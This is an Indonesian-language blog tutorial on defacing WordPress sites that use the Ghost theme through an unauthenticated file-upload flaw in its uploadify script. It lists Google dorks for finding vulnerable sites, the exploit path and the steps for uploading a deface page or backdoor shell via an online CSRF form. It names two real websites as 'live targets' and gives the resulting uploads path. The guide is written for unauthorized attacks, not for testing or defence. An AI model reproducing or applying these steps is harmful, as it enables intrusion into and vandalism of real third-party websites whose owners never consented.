Cara Deface Poc Wp Ghost

Assalamualaikum wr.wb

Halo kembali lagi bersama saya adit kali ini aku akan membagikan cara deface poc wp ghost ya.

Pertama-tama kamu siapin dulu bahan-bahan di bawah ini.

Bahan yang di butuhkan.

- Komputer / Hp

- Koneksi Internet/Wifi Indihome

- Script Deface

- Shell Backdoor (Jika dibutuhkan)

inurl:wp-content/themes/Ghost/

inurl:wp-content/themes/Ghost/includes/

inurl:wp-content/themes/Ghost/includes/uploadify/

inurl:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

exploit:/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Selanjutnya kamu pilih salah satu dork di atas lalu search di google kaya gini ya.

Kalo udah ngerdorking di google selanjutnya kamu pilih sala satu web yang ada tulisan this file incorect atau live target di bawah ini. 

Live Target :

- http://tayfunelektronik.com

- https://www.juvankoski.com

Nah kalo udah kamu buka website/live target di atas.

Nah itu ada tulisan this file is incorect selanjutnya kamu kamu masukin exploit/atau langsung copy aja websitenya kaya gini.

Nah itu ada tombol copynya kamu copy kalo udah kamu pake crsf online di bawah ini.

TOUCH ME SENPAI

Selanjutnya kamu paste yang kamu copy tadi di url target lalu kamu isi post filenya Filedata kaya gini.

Kalo udah kamu pencet lock target.

Nah kalo udah kaya gitu kamu tinggal pilih salah satu file yang mau di upload kaya gini.

Selanjutnya kamu Hack Target ntar otomatis ke redirect ke website yang vuln tadi.

Nah kalo udah kaya gitu udah berhasil selanjutnya kamu tambahin/kurangi url website dengan exploit di bawah ini.

/wp-content/uploads/settingsimages/sclu.html

Contoh:

https://www.juvankoski.com/wp-content/uploads/settingsimages/index.html

Dan duar terdefacelah webnya.

Sekian udah paham kan kalo ada yang mau ditayakan chat whatsapp aja oke selamat mencoba.

TOUCH ME SENPAI